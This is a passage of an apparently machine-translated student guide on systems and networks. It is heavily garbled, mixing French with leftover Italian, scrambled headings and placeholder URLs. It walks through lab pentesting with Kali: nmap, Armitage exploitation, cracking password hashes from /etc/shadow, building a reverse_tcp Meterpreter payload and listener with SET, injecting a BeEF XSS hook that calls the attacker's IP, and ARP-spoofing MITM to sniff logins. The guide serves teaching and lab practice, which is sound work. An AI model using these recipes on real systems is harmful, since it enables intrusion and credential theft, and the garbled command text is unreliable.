Condivise, dopodiché aggiungere una nuova cartella (icona sulla destra con il +), assegnare
le parcours, sélectionnez Montage Automatique et Rendre Permanent. Sur certaines VM (à
exemple celles avec Windows XP) il sera nécessaire d'installer les Guest depuis Virtual Box
Addition, en sélectionnant dans le menu Dispositifs de la VM "Insérer l'image CD des Invités"
Ajouts.

Kali Linux : la reine des distributions Linux dédiées à la sécurité, basée sur Debian, avec
préinstallé de nombreux outils utiles pour le hacking, le cracking, et plus généralement les tests de pénétration
et l'analyse judiciaire. Certaines versions au format .ova déjà configurées peuvent être téléchargées,

directement importables dans Virtual Box.

Les données d'accès par défaut peuvent varier en fonction de la version ou si vous avez téléchargé
une version déjà configurée, par exemple un .ova. Typiquement, ce sont root - toor ou kali -
kali.

metasploitable : une distribution Linux vulnérable créée pour expérimenter le penetration


test.

Identifiants de connexion par défaut :

login: msfadmin
password: msfadmin

Certains exploits utilisables avec Metasploit pour obtenir un shell depuis une machine
Metasploitable (en utilisant l'option « connexion inversée ») :
GU
D
IE
DT
E
SIHÈME
E
ST
RÉSEAUX
POUR
AUTO
E
T
S
T
ÉO
.T
.P
U
.P
T
S
D
IA
INTS

VM Windows XP : il est possible d'obtenir une copie d'XP légalement, valable 30 jours.
en la téléchargeant depuis le site de Microsoft en suivant une procédure particulière pour obtenir un fichier image
virtuel à utiliser dans VM. XP se prête particulièrement bien pour effectuer des tests d'intrusion.
TestétantunsystèmeobsolèteetsansplusdesupportdelapartdeMicrosoft(comme
Windows 7, et ils sont encore largement utilisés !

Procédure :

visitez le site [Link] e


téléchargez la version anglaise de « Windows XP Mode ». Extrayez le fichier ; parmi les fichiers extraits
chercher le dossier \sources, à l'intérieur se trouve un fichier au format XPM, une fois identifié
extraire le fichier XPM ; parmi les fichiers extraits, il y aura un fichier nommé VirtualXPVHD, à
renommer en [Link], puis préparer une nouvelle machine virtuelle sur Virtual
Box e utiliser comme disque virtuel le fichier [Link].
Una problematica della macchina XP è l’obsolescenza del browser, che non consentirà di
naviguer sur la majorité des sites protégés par SSL : il sera nécessaire de télécharger un ancien
version de Firefox (par exemple depuis des sites [Link]ù peut-on télécharger la
version 18.0) et copier le fichier dans la VM pour l'installer.

OUT
L
U
IST
L
S

D
SAN
SH
S
TER
L
/L
MN
IAL

netstat : fournit des statistiques sur les activités réseau, et des informations sur les ports et adresses sur lesquels
des connexions TCP et UDP sont actives. Fonctionne sous Windows et Linux.

Uso:

# netstat : liste toutes les connexions actives


# netstat -a : énumère les ports ouverts
# netstat -e :statistiques des interfaces
# netstat -r :affiche les tables de routage
# netstat -p proto :dove proto peut être par exemple IP, IPv6, TCP, ICMP, UDP (et d'autres)
indique les connexions actives relatives au protocole spécifié.

ifconfig : su Linux fournit des informations sur sa connexion IP. Avec le paramètre -a
GU
D
IE
DT
E
SIHÈME
E
ST
RÉSEAUX
POUR
AUTO
E
T
S
T
ÉO
.T
.P
U
.P
T
S
D
IA
INTS

# ipconfig /all :informations complètes sur toutes les interfaces réseau


# ipconfig/afficherdns : informations sur le cache DNS actuel
# ipconfig/flushdns : vide le cache DNS
# ipconfig/libérer id_interface :libère l’IP de l’interface spécifiée (l’identifiant va
individuato avec /all)
# ipconfig/renew id_interface :renouvelle l'IP de l'interface spécifiée (l'identifiant doit
individuato avec /all)

tracert (sous Windows) et traceroute (sous Linux) : montre tous les sauts qu'un paquet effectue
pour arriver à destination. L'utilisation du paramètre -d ne résout pas les noms des hôtes. Pour
sauvegarder le résultat sur fichier peut être utilisé sur Windows : (exemple)
# tracert [Link] > c:/[Link]
Les valeurs en ms affichées concernent le temps écoulé entre l'expédition et la réception d'un
paquet (si le temps est supérieur à 3s, un astérisque est affiché). Par défaut, il est montré
effectués au maximum 30 sauts, le calcul est effectué en envoyant des paquets ICMP et
attendant la réponse des passerelles traversées (ICMP TIME_EXCEEDED), chaque paquet
a un MAX_TTL (temps de vie) de 1 saut au départ, et ensuite jusqu'à atteindre
30 (à moins qu'il ne soit modifié par l'utilisateur).

sur Linux affiche les tables de routage actuelles, sur Windows doit être utilisé avec le
Le paramètre PRINT sert également à modifier manuellement les tableaux de routage.

ping : est utilisé pour mesurer le temps en ms pris par un paquet ICMP à
atteindre une destination réseau.

nmap : sous Linux, c'est un puissant outil de scan de réseau.

Uso:
scansione d'un hôte, sans compléter le 3-way handshake TCP : # nmap -sS [Link]
scansione complète : # nmap -sV [Link]
sortie sur fichier : # nmap -sV -oN [Link] [Link]
scansione sur port : # nmap -sS -p 8080 [Link]
scanne toutes les portes : # nmap -sS -p [Link]
scannage UDP : # nmap -sU -r -v [Link]
GU
D
IE
DT
E
SIHÈME
E
ST
RÉSEAUX
POUR
AUTO
E
T
S
T
ÉO
.T
.P
U
.P
T
S
D
IA
INTS

scansione via PING : # nmap -sP [Link]


scansione sans PING : # nmap -PN [Link]

arp-scan : sous Kali effectue une analyse ARP du réseau.

Uso:
# arp-scan —interface=eth0 [Link]/24 :spécifiant l'interface et l'adresse réseau avec
sous-réseau

arp : affiche la table arp actuelle. Utilisé avec le paramètre -a.

whois : fournit des informations du service WhoIS sur un domaine Internet.


Exemple :
# qui est [Link]

nslookup : fournit des informations sur les enregistrements NS d'un domaine internet.

Usage :

# [Link] des informations sur le domaine [Link]

# nslookup : active la console, les commandes suivantes sont données directement dans celle-ci :
# type=mx :etta come tipo solo i record di posta MX
# [Link]:appuyez sur entrer pour afficher les résultats
# type d'ensemble=ns :setta solo i record NS
# définir type=any : définit tous les enregistrements

OUT
L
G
ISÉNÉR
Q
IUES

TCPView : téléchargeable [Link], c'est un programme pour Windows qui montre


en temps réel l'état des connexions sur les ports (ÉTABLI, ATTENTE_DU_TEMPS)
CLOSE_WAIT,LISTENING). Il est capable de donner une interface graphique aux résultats généralement obtenus
via netstat ; en cliquant avec le bouton droit sur un processus, il est possible d'obtenir des informations
GUD
IE
DE
T
SIHÈMEE
ST
RÉSEAUX
POUR
AUTO
T
E
É
SO
T
.U
P
.P
T
.D
S
IIA
INTS

OUTL
IDE
LN
IUX

C'est un fichier contenant des noms d'utilisateur, des mots de passe et d'autres éléments à utiliser pour essayer des...
attacchi à dictionnaire. Sur Kali Linux, le répertoire où se trouvent ceux par défaut est /usr/
partager/listes_de_mots/

smtp-user-enum : outil de Kali qui sert à lister l'existence d'utilisateurs sur un serveur de
poste, par l'analyse avec dictionnaire.

Exemple :
# smtp-user-enum -M VRFY -U /usr/share/wordlists/fern-wifi/[Link] -t [Link]

nikto : outil de Kali Linux pour l’analyse des vulnérabilités des applications web, avec lequel on
ils peuvent obtenir de nombreuses informations sur une cible.

Uso:

# nikto -hô[Link]

Metasploit : outil de Kali Linux pour l'utilisation d'exploits connus. Il se lance automatiquement
lanciandoArmitage, une interface graphique particulièrement utile pour faire des tests de pénétration
testing.

N.B. Si elle ne démarre pas automatiquement, lancez les commandes suivantes (ignorer les éventuels
erreurs):

#service postgresql démarrer


#service metasploit démarrer
# msfconsole
et depuis la console lancer :
# /msfdbinit
/armitage

N.B. si Armitage n'était pas présent :


#sudo apt-get mettre à jour
GU
D
IE
DT
E
SIHÈME
E
ST
RÉSEAUX
POUR
AUTO
E
T
S
T
ÉO
.T
.P
U
.P
T
S
D
IA
INTS

Une fois la machine (ou les machines) cible apparaître, cliquez avec le bouton droit sur la
machine et sélectionner SCAN pour obtenir des informations.

Dans le menu ARMITAGE, sélectionner SET EXPLOIT RANK puis définir sur POOR.

Dans le menu ATTAQUES, sélectionnez TROUVER ATTAQUES et attendez. À la fin, apparaîtra dans
menu (clic droit sur la machine à attaquer) la commande ATTAQUER et vous pourrez
sélectionner les attaques possibles identifiées par Metasploit, qui enverront le payload à
machine cible. Si l'exploit réussit, l'icône de la machine changera et sera
"enveloppé" par des éclairs, indiquant qu'il est maintenant possible d'interagir.

Dans le menu, il est également possible de sélectionner l'option Hail Mary : c'est un commandement démonstratif qui

Tente des exploits au hasard sur les différentes machines.

John the Ripper : c'est un outil pour le craquage des mots de passe.
/etc/passwd est le fichier système de Linux où sont mémorisés les mots de passe (chiffrés, c'est
présente l’hash).
Pour afficher le contenu du fichier : # cat /etc/passwd
Dans le fichier, les hash des mots de passe ne sont pas visibles, pour les révéler et obtenir un fichier à utiliser.
pour essayer de déchiffrer les mots de passe, on utilise la commande unshadow :

# unshadow /etc/passwd /etc/shadow > fichier_hachage (où hashfile est le nom que nous voulons)
dare au fichier contenant les hachages visibles).

Uso:

john hashfile:essayer de cracker les mots de passe


# john --show hashfile:prova à cracker les mots de passe et montre le résultat dans le terminal
# john --wordlist=/usr/share/[Link] --rules hashfile:usa un attaque par dictionnaire via
wordlist

RainbowTable : c'est un fichier contenant le hachage de milliers de mots, chaînes, chiffres et


leurs combinaisons, sont utilisées pour retrouver les mots de passe en clair. Il existe plusieurs
services en ligne pour tester la sécurité de ses mots de passe via des tables arc-en-ciel, à
exemple OPHCrack.
GU
D
IE
DT
E
SIHÈME
E
ST
RÉSEAUX
POUR
AUTO
E
T
S
T
ÉO
.T
.P
U
.P
T
S
D
IA
INTS

On peut essayer par exemple sur une machine XP. Depuis Kali Linux, on peut utiliser SET, un outil.
qui se trouve à l'intérieur du groupe Social EngineeringTools. Une fois lancé, sélectionnez :

1) Attaques d'ingénierie sociale


4) Créer une Charge utile et un Écouteur
2) Windows Reverse_TCP Meterpreter

spécifier quand l'adresse IP de la machine attaquante est demandée (par exemple


[Link]), et le port de l'écouteur (par exemple 443)

un exécutable [Link] est créé dans le dossier /root/.usr/[Link] qui devra ensuite
être lancé sur la machine cible.

À la demande de démarrage de la charge utile, sélectionner oui.

Une session de Meterpreter sera lancée sur la machine cible dès que le payload sera exécuté.
sur la machine attaquante, sélectionnez ensuite la session avec la commande :
# séances -i n°_session
(voir le numéro dans la liste dans le terminal où apparaît le mot « ouvert »). Par le biais de
La commande help permet d'obtenir une liste des opérations qui peuvent être effectuées sur la cible.
machine, y compris par exemple enregistrer une capture d'écran du bureau ou prendre une photo avec la
webcam (se présente), démarrer des programmes, etc...

Pour relancer le listener s'il devait être éteint (par exemple après un redémarrage
della macchina), avviare msfconsole :

# msfconsole
# utiliser multi/handler
set payload windows/meterpreter/reverse_tcp
# définir LHOST [Link]
# définir LPORT 443
exploiter

BeEF XSS : est un outil de Kali pour tester des attaques de Cross Site Scripting. Il se lance depuis
menu Outils d'Exploitation. Au premier démarrage, il peut demander de modifier les
GU
D
ID
EE
SY
SSTÈME
TS
EM
E
R
TIÉSEAUX
POU
A
R
EU
É
T
T.U
O
T
.D
O
S
A
.IT
P
N
P
S
ITS

Dans le cas où le terminal se fermerait, l'URL d'accès depuis le navigateur est


[Link]:3000/ui/panel

Pour le prouver, on peut lancer une machine virtuelle OWASPBWA pour obtenir une page.
vulnérable au XSS, à l'adresse de la machine (d'exemple) [Link]
owaspbricks/content-2/[Link]?user:harry auquel on peut ajouter à la fin de l'URL le script :

[Link] <script src= http://


[Link]:3000/[Link]></script>

dove [Link] est l'IP de la machine Kali où BeEF est en cours d'exécution.

ensuite, la connexion au navigateur apparaîtra dans BeEF et la possibilité d'interagir avec


la machine cible. Pour arrêter le serveur, utilisez le menu Outils Système>BeEF
Arrête.

MITM avec arpspoof : arpspoof est un outil de Kali pour effectuer une attaque de poisonnement ARP.
en utilisant des réponses ARP falsifiées, en tirant parti du fait qu'elles ne sont pas vérifiées par
protocole. L'ordinateur qui attaque fait croire au serveur qu'il est le client, et au client qu'il est
le serveur d'une communication, via une attaque MITM.

Installer arpspoof :

sudo apt-get update


# sudo apt-get install dsniff

Uso:

démarrer une machine Kali et une machine cible, par exemple une VM Windows XP.
Lancer depuis cmd la commande

# arp -a

et vérifier l'adresse MAC pour l'IP actuelle.


Sur la machine Kali, utilisez la commande # ip route show pour connaître votre passerelle, et
puis activer le mode promiscuous sur l'interface en cours d'utilisation (par exemple eth0) pour intercepter
GUD
IE
DESUJETE
ST
RÉSEAUX
POUR
AUTOT
SO
E
É
P.T
P
.T
S
IU
.IDA
INTS

# arpspoof -i eth0 -t IP_gateway IP_bersaglio : où eth0 est l'interface réseau à utiliser sur
Kali)
# arpspoof -i eth0 -t IP_bersaglio IP_gateway : où eth0 est l'interface réseau à utiliser sur
Kali)

L'attaqueMITMparempoisonnementARP(appeléaussispoofingARP)estlancée,ilestmaintenantpossiblede
vérifier sur la machine cible comment a changé la table ARP. Pour vérifier les effets de
un MITM si può avviare una macchina OWasp di appoggio, che fornisce ad esempio un web
serveur navigable en clair et sans cryptage, auquel on accède depuis un navigateur avechttp://
[Link]/owaspbricks/
Sur la machine Kali, il est possible de lancer divers outils pour intercepter le trafic effectué entre la VM
bersaglio et Owasp simplement en naviguant sur le site :

# driftnet -i eth0 intercepte chaque image affichée lors de la navigation de l'utilisateur.


Il fonctionne même si l'utilisateur navigue sur internet, mais seulement sur des sites en clair et sans https.

# urlsnarf -i eth0 : intercepte tous les URL navigués par l'utilisateur.

On peut vérifier d'autres vulnérabilités des protocoles sans cryptographie en utilisant


Wireshark sur Kali, en filtrant par exemple avec la chaîne :

[Link]==[Link] et [Link]=="POST"

Je suis en train d'essayer d'utiliser la page de connexion d'OWasp, en regardant dans le paquet intercepté dans
claire le nom d'utilisateur et le mot de passe de l'utilisateur.

Unefoisl'attaqueterminée,fermerlesdifférentsterminauxetdésactiverlemodepromiscuous.
# sysctl -w net.ipv4.ip_forward=0

WIRESHARK

Wireshark : est un analyseur de paquets open source utilisé pour analyser le trafic réseau.
Présentez divers outils pour l'inspection des paquets et des protocoles.

Configurations utiles
GU
D
IE
DT
E
SIHÈME
E
ST
RÉSEAUX
POUR
AUTO
E
T
S
T
ÉO
.T
.P
U
.P
T
S
D
IA
INTS

[Link] || tls poignée_de_main.extensions_nom_serveur

pour filtrer sur les hôtes consultés via une connexion http ou https.

- Aller dans le menu : Affichage -> Format d'affichage du temps


On peut changer l'affichage par défaut qui indique les secondes depuis le début de la capture avec
date et heure de l'événement.

Recherche et filtrage

Rechercher et exporter un contenu depuis HTTP ou autre : se connecter à n'importe quel site et
télécharger un fichier (par exemple un fichier texte ou PDF). Dans le fichier de capture, filtrer avec

# [Link]

pour identifier les sites à partir desquels du contenu a été demandé, il est éventuellement possible de filtrer

ultérieurement avec

# http contient “nomedelsito”

en sélectionnant les paquets identifiés par un GET dans le champ info, on peut cliquer sur le menu
Fichier->Exporter Objets->HTTP et sauvegarder le contenu du fichier à partir du fichier de capture.

La même chose peut être faite en déterminant le type de contenu d'un paquet en examinant le
flux TCP, par exemple si l'on identifie du code HTML, on peut exporter l'objet sous forme de fichier
HTML.

Rechercher et exporter un contenu depuis SMTP : typique des logiciels malveillants qui transformé le

machine infectée dans un spambot, filtrer avec :

# [Link]é[Link]

Fichier->Exporter Objets->IMF (Format de Message Internet) et sauvegarder le contenu du fichier


EML (email) du fichier de capture.

Rechercher et exporter un contenu depuis FTP : se connecter à n'importe quel serveur FTP et
GU
D
IE
DE
T
SIHÈME
E
SR
TÉSEAUX
POUR
AUT
E

T
S
.T
O
.U
P
.T
D
P
SIANTS

# données-ftp

on peut voir ce qui a été transféré, pour sauvegarder un fichier il faut chercher parmi les paquets ceux
con commande RETR (c'est-à-dire ceux qui sont demandés pour être transférés du serveur FTP), à l'intérieur de
pacchetto cercare il nome del file (si trova in FTP DATA [Command: RETR nomefi[Link]]),
donc sélectionnez le paquet, cliquez avec le bouton droit de la souris et sélectionnez SUIVRE -> FLUX TCP,

Ensuite, dans l'écran, réglé AFFICHER ET ENREGISTRER COMME - ASCII, et enregistrer


avec le nom du fichier identifié précédemment. Pour rechercher des fichiers spécifiques, il est possible d'appliquer un filtre :

# [Link] contient “estensione”

par exemple

# [Link] contient « pdf »

Rechercher et exporter des objets à partir d'un fichier de capture (pcap) :

L'opérationd'exportationpeutêtreeffectuéedirectementsurlefichierpcapsansfiltrer,danscecas
Les objets correspondant à la demande sont exportés de cette manière :

Fichier->Exporter Objets->HTTP exporter contenus HTTP

Fichier->Exporter Objets->IMF exporte mail

Filtrer et rechercher dans la navigation web :

pour rechercher parmi les sites visités en HTTP et en HTTPS, appliquer le filtre :

# [Link] ou [Link] == 1

pour rechercher à l'intérieur des paquets HTTP des sites spécifiques :

# [Link] contient « stringa »

ou pour les sites HTTPS :

# ssl contient “nomedelsito”


GU
D
IE
DT
E
SIHÈME
E
ST
RÉSEAUX
POUR
AUTO
E
T
S
T
ÉO
.T
.P
U
.P
T
S
D
IA
INTS

trop denses les fichiers de capture, et en insérant d'éventuels appels DNS qui peuvent révéler
connexions à des serveurs suspects :

# ([Link] ou [Link] == 1 ou [Link] eq 0x0002 ou dns) et !([Link] eq


1900)

Chercher le trafic torrent :

Vari filtres pour chercher du trafic torrent :

# bittorrent

# [Link] contient .torrent

# [Link] contient announce ou [Link] contient scrape

# info_hash= //cherche le hash SHA du fichier demandé via torrent, qui a la forme
/[Link]?info_hash=XXX

Cherchez des informations sur les hôtes : il est possible de filtrer le trafic DHCP pour trouver des informations.

sur les hôtes du réseau, à travers le filtre :

# bootp (ou dhcp sur les versions précédentes de Wireshark)

sélectionner un paquet DHCP REQUEST, développer l'onglet Protocole de démarrage, et dans les
L'option permet de trouver l'Identifiant Client (qui contient l'adresse Mac) et le Nom de l'Hôte.

Pour rechercher via un filtre dans les différents contenus des options, ils sont affichés dans un menu à
tendina écrivant :

# [Link]

par exemple pour rechercher un nom d'hôte :

# [Link] contains “nome-host-da-cercare“

Étant donné que le trafic DHCP n'est pas fréquent, on peut rechercher les traces NBNS (dûes au
GUD
IE
DE
T
SIHÈMEE
ST
RÉSEAUX
POUR
AUTO
T
E
É
SO
T
.U
P
.P
T
.D
S
IIA
INTS

# [Link]==[Link] //filtre les paquets contenant l'IP indiquée

# [Link]==[Link] et ssl // filtre seulement les paquets SSL

# [Link]==[Link] et [Link]==443 // filtre uniquement les paquets utilisant le port


TCP indiquée

Filtraggi utili:

# [Link] || [Link].extensions_server_name // filtre les connexions à des sites web et


permet de localiser les URL, même pour les connexions frittées

# [Link] contient “/90" //filtre les URI qui contiennent /90, dans ce cas il est
fait parce qu'on est à la recherche d'une partie d'URI connue utilisée par un malware

# [Link] contient .exe // filtre les URI qui contiennent un fichier avec l'extension .exe

# ip contient mail // filtre les paquets relatifs à mail

Ce programme contient "Ce programme" // filtre les paquets qui contiennent en eux la mention
« Ce programme ne peut pas être exécuté en mode DOS. » qui appartient aux fichiers exécutables de Windows, si

On pense qu'un malware a été téléchargé.

# [Link] et !([Link] contient $) // recherche entre les paquets


informations sur les utilisateurs qui s'authentifient via le protocole d'authentification réseau
Kerberos, le champ cname contient le nom d'utilisateur.

# Http contient des posts // filtre les paquets qui contiennent des POST vers des formulaires web

RESOURCESN
L
G
INE

Url Shortner : est un service en ligne qui raccourcit les URL sur le web (par [Link]). Naît
pour simplifier la diffusion des liens, il est cependant particulièrement utilisé pour des attaques
informaticiens (du phishing au XSS), car en masquant l'URL, il n'est pas immédiatement clair
à l'utilisateur sur la destination du lien. Il est également utilisé dans les attaques XSS
juste pour cacher l'ajout à la fin d'une URL d'un script malveillant.
GU
D
IE
DE
T
SIHÈME
E
SR
TÉSEAUX
POUR
AUT
E

T
S
.T
O
.U
P
.T
D
P
SIANTS

- [Link]/projects/ophcrack : page officielle du projet OPHCrack, un cracker de


mot de passe pour Windows basé sur RainbowTable.

- [Link]/fr/ophcrack : site du fabricant d'OPHCrack, utilisable en ligne


pour vérifier le cracking via une table arc-en-ciel.

- [Link]/projects/owaspbwa/ : page officielle d'OWASP, une version de Linux


farcita de services web vulnérables. Utilisateur : root, Mot de passe : owaspbwa

- [Link]/projects/metasploitable/ : page officielle de Metasploitable (voir ci-dessus).

- [Link] officielle du client SSH et Telnet PuTTY pour Windows.

- [Link]:databaseche raccoglie vulnerabilità e exploit noti.

- [Link] d'où il est possible d'extraire d'anciennes versions de logiciels,


per testare exploit e vulnerabilità. Da utilizzare solo in ambienti di test (meglio una VM).

- [Link] qui collecte des "instantanés" de la majorité des sites web, est
il est possible de le naviguer et d'aller récupérer de vieilles pages et versions des sites.

- [Link] pour trouver le fabricant d'une interface réseau en fournissant le


Adresse Mac.

- [Link] qui collecte des VM Linux déjà prêtes à l'emploi pour


Virtual Box et VMWare. Généralement, les données d'accès sont Login : root Mot de passe :
[Link]

- [Link]
[Link]: page du site officiel de l'IANA (Internet Assigned Numbers
Autorité) où trouver la liste des « ports bien connus ».

- [Link] dépôt pour l'analyse


de fichiers potentiellement infectés.

- [Link] pour l'analyse de fichiers pcap à la recherche de malwares et


GUD
IE
DE
ST
S
IHÈMEE
ST
RÉSEAUX
POUR
AUTOT
SO
ET
P
É
.P
.L
T
S
.IÈ
IVES

POUR
CONCLURE
Le Guide a déjà remplacé la grande Encyclopédie galactique, comme l'indiscutable dépositaire de tout
la connaissance et la sagesse, pour deux raisons importantes. Premièrement, cela coûte un peu moins cher ; deuxièmement, cela porte l'inscription,

NE PANIQUEZ PAS, rien de paniquer, en grandes lettres rassurantes sur la couverture. « (de 'Guide du voyageur galactique'

per autostoppisti” de Douglas Adams)

L'écriture de ce guide a commencé en 2019, afin de fournir à mes étudiants un


référence lors de l'étude et de la révision de la discipline « Systèmes et Réseaux » en vue de l'examen
d'État. Il est en constante mise à jour, il est fait par passion pour l'informatique et
l'enseignement, et il repose sur un travail continu de recherche et de synthèse des sujets les plus
importants (malheureusement fait dans les moments libres) et n'est certainement pas complet ni exempt de
erreurs, comme un logiciel ne sera jamais exempt de bogues. Je serai reconnaissant pour tout retour d'information,

signalement et correction que vous souhaitez m'envoyer via mon [Link].

À la page[Link] il est également possible de télécharger une

recueil mis à jour de sujets d'examen pour le cours ITIS en Informatique et Télécommunications art.
Télécommunicationsavecquelquessolutionsrécupéréessurleréseau.

Merci pour tout le poisson !

SimoneZanela

LICENCE

Ce travail est une "Œuvre Culturelle Libre" : "Guide des Systèmes et Réseaux pour Auto-stoppeurs ...et
Les "Étudiants" sont distribués sous Licence Creative Commons Attribution - Partager à
même manière 4.0 International. - [Link]
[Link]

VERSION

Vous aimerez peut-être aussi